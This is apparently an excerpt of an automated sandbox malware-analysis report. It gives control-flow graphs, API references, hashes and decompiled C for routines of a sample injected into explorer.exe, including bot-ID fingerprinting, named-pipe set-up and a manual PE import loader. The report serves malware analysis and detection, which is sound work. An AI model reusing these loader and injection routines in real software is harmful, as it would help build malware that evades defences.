        control_flow_graph 62 10028d00-10028d18 63 10028d36 62->63 64 10028d1a-10028d34 62->64 65 10028d3c-10028d4d 63->65 64->65 66 10028d6b-10028d72 65->66 67 10028d4f-10028d69 65->67 68 10028d78-10028d9f 66->68 67->68 69 10028da1-10028db4 68->69 70 10028db6-10028dc6 68->70 71 10028dcc-10028df3 GetSystemDirectoryW 69->71 70->71 72 10028e02-10028e38 VirtualProtectEx 71->72 73 10028df5-10028dfd 71->73 74 10028e54-10028e85 72->74 75 10028e3a-10028e4e 72->75 73->72 76 10028ea0-10028ec3 74->76 77 10028e87-10028e9b 74->77 75->74 78 10028ec5-10028eda 76->78 79 10028edd-10028ef4 76->79 77->76 78->79 80 10028f00-10028f0b 79->80 81 10028f34-10028f57 GetSystemDirectoryW 80->81 82 10028f0d-10028f2a 80->82 84 10028f75-10028fc0 81->84 85 10028f59-10028f6f 81->85 82->81 83 10028f2c-10028f32 82->83 83->80 83->81 87 10028fc5-10028fc9 84->87 85->84 88 10028fcb-10028fe5 87->88 89 10028fef 87->89 90 10028ff2-10029003 88->90 91 10028fe7-10028fed 88->91 89->90 92 10029005-10029015 90->92 93 10029018-1002902c 90->93 91->87 91->89 92->93 94 10029030-10029039 93->94 95 1002903b-10029057 94->95 96 10029059-1002908b 94->96 95->94 95->96 97 10029090-1002909b 96->97 98 100290cb-100290d4 97->98 99 1002909d-100290c1 97->99 99->98 100 100290c3-100290c9 99->100 100->97 100->98
        APIs
        • GetSystemDirectoryW.KERNEL32(10076908,00000744), ref: 10028DE1
        • VirtualProtectEx.KERNEL32(000000FF,101159C8,000051F0,00000040,10114064), ref: 10028E25
        Memory Dump Source
        • Source File: 00000010.00000002.631250512.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_10021000_regsvr32.jbxd
        Similarity
        • API ID: DirectoryProtectSystemVirtual
        • String ID:
        • API String ID: 648172718-0
        • Opcode ID: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
        • Instruction ID: 8567422235b8483302f276b06f5c76c9c9f5ec01d0adbca6e2a98c3bb5a49452
        • Opcode Fuzzy Hash: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
        • Instruction Fuzzy Hash: 6AA1D435A046F14FE7349B388DD81E83FB2EB99312B59476AD4C4A72A5D2BE4CC4CB50
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Function 10029B30, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 101 10029b30-10029ba9 GetWindowsDirectoryW 102 10029bc0-10029bf1 FindFirstChangeNotificationW 101->102 103 10029bab-10029bb9 101->103 104 10029bf3-10029c06 102->104 105 10029c08-10029c26 102->105 103->102 106 10029c29-10029c30 104->106 105->106 107 10029c32-10029c37 106->107 108 10029c3b-10029c6f 106->108 107->108 110 10029c74-10029c7d 108->110 111 10029c9b-10029cab 110->111 112 10029c7f-10029c99 110->112 113 10029cbc-10029cbe 111->113 114 10029cad-10029cb7 111->114 112->110 112->111 115 10029cc0-10029cd5 113->115 116 10029cd7-10029cec 113->116 114->113 115->116 118 10029cf1-10029cfa 116->118 119 10029d18-10029d47 118->119 120 10029cfc-10029d16 118->120 120->118 120->119
        APIs
        • GetWindowsDirectoryW.KERNEL32 ref: 10029B87
        • FindFirstChangeNotificationW.KERNEL32(10114AA8,00000000,00000020), ref: 10029BD2
        Strings
        Memory Dump Source
        • Source File: 00000010.00000002.631250512.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_10021000_regsvr32.jbxd
        Similarity
        • API ID: ChangeDirectoryFindFirstNotificationWindows
        • String ID: 1
        • API String ID: 3662519435-2212294583
        • Opcode ID: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
        • Instruction ID: a17468885719ca7b42c6c3de4681764e2a8d7b2457ed512f777c56a051c8a142
        • Opcode Fuzzy Hash: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
        • Instruction Fuzzy Hash: 3851CF72A043A08FE335CF28CCC85D677E1EB88302F21472ED58597295D6BAAC85CB81
        Uniqueness

        Uniqueness Score: -1.00%

        Analysis Process: explorer.exe PID: 1256 Parent PID: 2536 explorer.exeCOMMON

        Executed Functions

        Function 00085A61, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00085A61(void* __eflags) {
				intOrPtr _t2;
				void* _t6;
				void* _t7;

				_t2 =  *0x9e684; // 0x133f8f0
				 *((intOrPtr*)(_t2 + 0x108))(1, E00085A06);
				E00085631(_t6, _t7); // executed
				return 0;
			}






        0x00085a61
        0x00085a6d
        0x00085a73
        0x00085a7a

        APIs
        • RtlAddVectoredExceptionHandler.NTDLL(00000001,00085A06,00085CE8), ref: 00085A6D
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: ExceptionHandlerVectored
        • String ID:
        • API String ID: 3310709589-0
        • Opcode ID: bf483f35d551d8ef1a3c1b7981991285dfd450bd0acbef69aa8c4020bc965baf
        • Instruction ID: 435aaf7462d5f916828f25a0b113b0bfc22426b62e8c3a1df64e723560edf676
        • Opcode Fuzzy Hash: bf483f35d551d8ef1a3c1b7981991285dfd450bd0acbef69aa8c4020bc965baf
        • Instruction Fuzzy Hash: 2FB092312509409BD640FB60CC8AEC83290BB20782F4100A072858A0A3DAE048906702
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00084A0B, Relevance: 10.8, APIs: 7, Instructions: 285stringpipeCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 0 84a0b-84a3f memset 1 84a5b-84a64 call 8bb8d 0->1 2 84a41-84a57 0->2 6 84a7f-84ae0 call 8b7a8 call 8b67d call 849c7 call 8c379 call 8d400 call 8b88a call 82c8f 1->6 7 84a66-84a71 call 82ba4 1->7 2->1 26 84aea-84b09 call 892e5 6->26 27 84ae2-84ae5 6->27 10 84a76-84a79 7->10 10->6 13 84d64 10->13 15 84d66-84d6c 13->15 30 84b0b-84b13 26->30 31 84b5e-84b63 26->31 27->13 32 84b51-84b53 30->32 33 84b15-84b4f call 895e1 call 8bfec call 885d5 30->33 34 84b65-84b97 call 8c292 CreateNamedPipeA 31->34 35 84bc6-84bdb call 891e3 * 2 31->35 32->31 38 84b55-84b59 call 8e286 32->38 33->38 46 84b99-84ba9 call 8861a 34->46 47 84bae-84bc4 call 8861a 34->47 54 84be0-84c01 call 89b43 35->54 38->31 46->15 47->54 54->13 60 84c07-84c49 call 89f48 call 89f6c call 8a0ab 54->60 67 84c4b-84c4d call 8a3ed 60->67 68 84c52-84c57 60->68 67->68 70 84c59-84c5b call 8a3ed 68->70 71 84c60-84c7d call 8980c call 8a0ab 68->71 70->71 76 84c82-84c8a 71->76 77 84c8c-84c98 76->77 78 84cb2-84cbf 76->78 79 84c9a 77->79 80 84cdd-84ce4 77->80 81 84cc9-84cd6 call 8fc1f 78->81 82 84cc1-84cc7 78->82 83 84ca0-84ca2 call 8553f 79->83 85 84cee-84cfe call 852c0 80->85 86 84ce6-84ce9 call 8e23e 80->86 92 84ca7-84ca9 81->92 82->83 83->92 93 84d00-84d0c 85->93 94 84d55-84d5a 85->94 86->85 95 84cd8 92->95 96 84cab 92->96 97 84d4d-84d4f lstrcpyW 93->97 98 84d0e-84d4b call 8109a lstrcpyW call 885d5 lstrcatW * 3 93->98 99 84d5c-84d60 94->99 100 84d62 94->100 95->80 96->78 97->94 98->94 99->100 100->13
        C-Code - Quality: 80%
        			E00084A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				CHAR* _v1112;
				char _v1116;
				void* __esi;
				intOrPtr _t66;
				CHAR* _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t80;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				CHAR* _t106;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x9e688; // 0xb0000
					_t125 =  *0x9e68c; // 0x133fab8
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E0008BB8D(_t187) != 0) {
					L4:
					_t134 = _t128; // executed
					_t66 = E0008B7A8(_t134,  &_v516); // executed
					_push(_t134);
					_v1104 = _t66;
					E0008B67D(_t66,  &_v1076, _t206, _t208);
					_t129 = E000849C7( &_v1076,  &_v1076, _t206);
					_t141 = E0008D400( &_v1076, E0008C379( &_v1076), 0);
					E0008B88A(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E00082C8F(_t187,  &_v1076, _t206, _t208); // executed
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E000892E5(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x9e688; // 0xb0000
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E000891E3(_v1112);
								_t145 = _t130;
								 *0x9e740 = _t76;
								 *0x9e738 = E000891E3(_t145);
								L17:
								_push(_t145);
								_t80 = E00089B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
								_t188 = _t80;
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x9b9ca);
								E00089F48(0xe); // executed
								E00089F6C(_t188, _t208, _t130); // executed
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb; // executed
								E0008A0AB(_t188, _t178, _t208); // executed
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E0008A3ED(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E0008A3ED(_t188, _t180, _t208); // executed
								}
								_t87 = E0008980C(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2; // executed
								_t89 = E0008A0AB(_t153, _t181, _t208); // executed
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x9e688; // 0xb0000
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E0008FC1F(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x9e688; // 0xb0000
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E0008E23E(_t183);
										}
										E000852C0( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x9e688; // 0xb0000
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E0008109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E000885D5( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0xb0228
									_t153 = _t51;
									L25:
									_t90 = E0008553F(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x9e688; // 0xb0000
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E0008C292(_v1104, __eflags);
							_v1112 = _t106;
							_t108 = CreateNamedPipeA(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x9e684; // 0x133f8f0
								 *((intOrPtr*)(_t109 + 0x30))();
								E0008861A( &_v1116, _t192);
								_t145 = _t108;
								goto L17;
							}
							E0008861A( &_v1112, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E0008E286(_v1112, _t175); // executed
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E000895E1(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E0008BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E000885D5( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E00082BA4( &_v1044, _t192, 0x105); // executed
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}





























































        0x00084a0b
        0x00084a18
        0x00084a23
        0x00084a28
        0x00084a2a
        0x00084a2d
        0x00084a32
        0x00084a35
        0x00084a3f
        0x00084a41
        0x00084a4e
        0x00084a57
        0x00084a57
        0x00084a64
        0x00084a7f
        0x00084a86
        0x00084a88
        0x00084a8d
        0x00084a92
        0x00084a98
        0x00084aa7
        0x00084ac6
        0x00084ac8
        0x00084ace
        0x00084ad4
        0x00084ad9
        0x00084add
        0x00084ae0
        0x00084aea
        0x00084aec
        0x00084aed
        0x00084af8
        0x00084afa
        0x00084afd
        0x00084b02
        0x00084b09
        0x00084b5e
        0x00084b5e
        0x00084b63
        0x00084bca
        0x00084bcf
        0x00084bd1
        0x00084bdb
        0x00084be0
        0x00084be0
        0x00084bf5
        0x00084bfa
        0x00084bfc
        0x00084bff
        0x00084c01
        0x00000000
        0x00000000
        0x00084c07
        0x00084c11
        0x00084c1a
        0x00084c1f
        0x00084c22
        0x00084c28
        0x00084c2e
        0x00084c36
        0x00084c38
        0x00084c3b
        0x00084c3c
        0x00084c41
        0x00084c44
        0x00084c47
        0x00084c49
        0x00084c4d
        0x00084c4d
        0x00084c52
        0x00084c55
        0x00084c57
        0x00084c5b
        0x00084c5b
        0x00084c62
        0x00084c67
        0x00084c69
        0x00084c6d
        0x00084c6f
        0x00084c75
        0x00084c79
        0x00084c7c
        0x00084c7d
        0x00084c82
        0x00084c85
        0x00084c8a
        0x00084cb2
        0x00084cb8
        0x00084cbf
        0x00084cce
        0x00084cd3
        0x00000000
        0x00084cd3
        0x00084cc1
        0x00000000
        0x00084c8c
        0x00084c8c
        0x00084c91
        0x00084c98
        0x00084cdd
        0x00084cdd
        0x00084ce4
        0x00084ce8
        0x00084ce9
        0x00084ce9
        0x00084cf3
        0x00084cf8
        0x00084cfb
        0x00084cfc
        0x00084cfe
        0x00084d00
        0x00084d05
        0x00084d0c
        0x00084d4f
        0x00084d0e
        0x00084d13
        0x00084d1b
        0x00084d1f
        0x00084d2a
        0x00084d35
        0x00084d3d
        0x00084d41
        0x00084d49
        0x00084d49
        0x00084d0c
        0x00084d55
        0x00084d58
        0x00084d5a
        0x00084d60
        0x00084d60
        0x00084d62
        0x00084d62
        0x00000000
        0x00084d62
        0x00084c9a
        0x00084c9a
        0x00084ca0
        0x00084ca2
        0x00084ca7
        0x00084ca7
        0x00084ca9
        0x00084cd8
        0x00000000
        0x00084cd8
        0x00084cab
        0x00084ae4
        0x00084ae4
        0x00000000
        0x00084ae4
        0x00084c8a
        0x00084b69
        0x00084b77
        0x00084b8f
        0x00084b95
        0x00084b97
        0x00084baf
        0x00084bb4
        0x00084bbd
        0x00084bc3
        0x00000000
        0x00084bc3
        0x00084b9f
        0x00084ba8
        0x00000000
        0x00084ba8
        0x00084b0b
        0x00084b11
        0x00084b13
        0x00084b51
        0x00084b53
        0x00000000
        0x00000000
        0x00084b55
        0x00084b59
        0x00000000
        0x00084b59
        0x00084b15
        0x00084b1f
        0x00084b2b
        0x00084b36
        0x00084b3d
        0x00084b47
        0x00084b4c
        0x00000000
        0x00084b4c
        0x00084ae2
        0x00000000
        0x00084a66
        0x00084a71
        0x00084a77
        0x00084a79
        0x00084d64
        0x00084d64
        0x00084d66
        0x00084d6c
        0x00084d6c
        0x00000000
        0x00084a79

        APIs
        • memset.MSVCRT ref: 00084A2D
        • CreateNamedPipeA.KERNEL32(00000000,00080003,00000006,000000FF,00000400,00000400,00000000,00000000), ref: 00084B8F
        • lstrcpyW.KERNEL32(00000000,00000000), ref: 00084D1F
        • lstrcatW.KERNEL32 ref: 00084D3D
        • lstrcatW.KERNEL32 ref: 00084D41
        • lstrcatW.KERNEL32 ref: 00084D49
        • lstrcpyW.KERNEL32(00000000,00000000), ref: 00084D4F
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: lstrcat$lstrcpy$CreateNamedPipememset
        • String ID:
        • API String ID: 2307407751-0
        • Opcode ID: 7b912f2f440b3ae73bb546fbd17fc2a48739519a53412bd301377ca53efd02bb
        • Instruction ID: dec47ca1d8cbe9d9e50b353cb195f6a6744e81453b5205875f33d8479ea457cb
        • Opcode Fuzzy Hash: 7b912f2f440b3ae73bb546fbd17fc2a48739519a53412bd301377ca53efd02bb
        • Instruction Fuzzy Hash: FC919E71604302AFE754FB24DC86FBA73E9BB84720F14452EF5958B292EB74DD048B92
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008B7A8, Relevance: 9.1, APIs: 6, Instructions: 83stringCOMMON
        Download Yara Rule

        Control-flow Graph

        C-Code - Quality: 94%
        			E0008B7A8(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				GetComputerNameW( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E000895E1(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E000885D5( &_v16);
				_t33 = E0008C392(_t43);
				E00089640( &(_t43[E0008C392(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E0008C392(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E0008D400(_t43, E0008C392(_t43) + _t40, 0);
			}















        0x0008b7a8
        0x0008b7b1
        0x0008b7bd
        0x0008b7c3
        0x0008b7c5
        0x0008b7cd
        0x0008b7e0
        0x0008b7ef
        0x0008b7fa
        0x0008b807
        0x0008b821
        0x0008b826
        0x0008b828
        0x0008b82f
        0x0008b83f
        0x0008b850
        0x0008b85a
        0x0008b862
        0x0008b869
        0x0008b86c
        0x0008b889

        APIs
        • memset.MSVCRT ref: 0008B7C5
        • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 0008B7E0
        • lstrcpynW.KERNEL32(?,?,00000100), ref: 0008B7EF
        • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0008B821
          • Part of subcall function 00089640: _vsnwprintf.MSVCRT ref: 0008965D
        • lstrcatW.KERNEL32 ref: 0008B85A
        • CharUpperBuffW.USER32(?,00000000), ref: 0008B86C
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
        • String ID:
        • API String ID: 3410906232-0
        • Opcode ID: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
        • Instruction ID: 8115248732dee6e15747b0cfab76d271734f3ac179cb7c14a2a6e9e989f043a1
        • Opcode Fuzzy Hash: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
        • Instruction Fuzzy Hash: F82156B2A00214BFE714BBA4DC4AFEE77BCFB85310F108566B505E6182EE755F088B60
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008CF84, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
        Download Yara Rule

        Control-flow Graph

        C-Code - Quality: 94%
        			E0008CF84(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x9e688; // 0xb0000
				GetCurrentProcess();
				_t11 = E0008BA05(); // executed
				_t1 = _t29 + 0x1644; // 0xb1644
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E00088FBE(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0xb0228
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E00088FBE(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E0008E3B6(_t3);
				_t7 = _t29 + 0x220; // 0xb0220
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E0008E3F1(_t7); // executed
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}








        0x0008cf87
        0x0008cf89
        0x0008cf90
        0x0008cf98
        0x0008cfa2
        0x0008cfa2
        0x0008cfa8
        0x0008cfb1
        0x0008cfb7
        0x0008cfb9
        0x0008cfbd
        0x0008cfbd
        0x0008cfc2
        0x0008cfc8
        0x0008cfd8
        0x0008cfe2
        0x0008cfea
        0x0008cfed
        0x0008cff9
        0x0008cfff
        0x0008d004
        0x0008d00a
        0x0008d010
        0x0008d016
        0x0008d01e

        APIs
        • GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
        • GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
        • memset.MSVCRT ref: 0008CFE2
        • GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
        • GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CurrentProcess$FileModuleNameVersionmemset
        • String ID:
        • API String ID: 3581039275-0
        • Opcode ID: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
        • Instruction ID: 1cd3ccc896d32ed381cc1e7efd68f96a46d511454c8c9de3dc1a9453bb6438f5
        • Opcode Fuzzy Hash: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
        • Instruction Fuzzy Hash: C4015E70901700ABE720BF70D84AADAB7E5FF85310F04082EF59683292EF746545CB51
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0009249B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 134 9249b-924a9 135 924ab-924ae 134->135 136 924b3-924f3 GetModuleHandleA call 8e099 134->136 137 92660-92661 135->137 140 924f9-92510 136->140 141 9265e 136->141 142 92513-9251a 140->142 141->137 143 9251c-92525 142->143 144 92527-92537 142->144 143->142 145 9253a-92541 144->145 145->141 146 92547-9255e LoadLibraryA 145->146 147 92568-9256e 146->147 148 92560-92563 146->148 149 9257d-92586 147->149 150 92570-9257b 147->150 148->137 151 92589 149->151 150->151 152 9258d-92593 151->152 153 92599-925b1 152->153 154 92650-92659 152->154 155 925b3-925d2 153->155 156 925d4-92602 153->156 154->145 159 92605-9260b 155->159 156->159 160 92639-9264b 159->160 161 9260d-9261b 159->161 160->152 162 9261d-9262f 161->162 163 92631-92637 161->163 162->160 163->160
        C-Code - Quality: 50%
        			E0009249B(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				struct HINSTANCE__* _t121;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E0008E099(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
						_v36 = _t121;
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}























        0x000924a1
        0x000924a9
        0x000924be
        0x000924d0
        0x000924dc
        0x000924e2
        0x000924e7
        0x000924f3
        0x0009265e
        0x00000000
        0x0009265e
        0x000924f9
        0x00092502
        0x00092510
        0x00092513
        0x00092522
        0x00092522
        0x00092529
        0x00092537
        0x0009253a
        0x00092551
        0x00092557
        0x0009255e
        0x0009256e
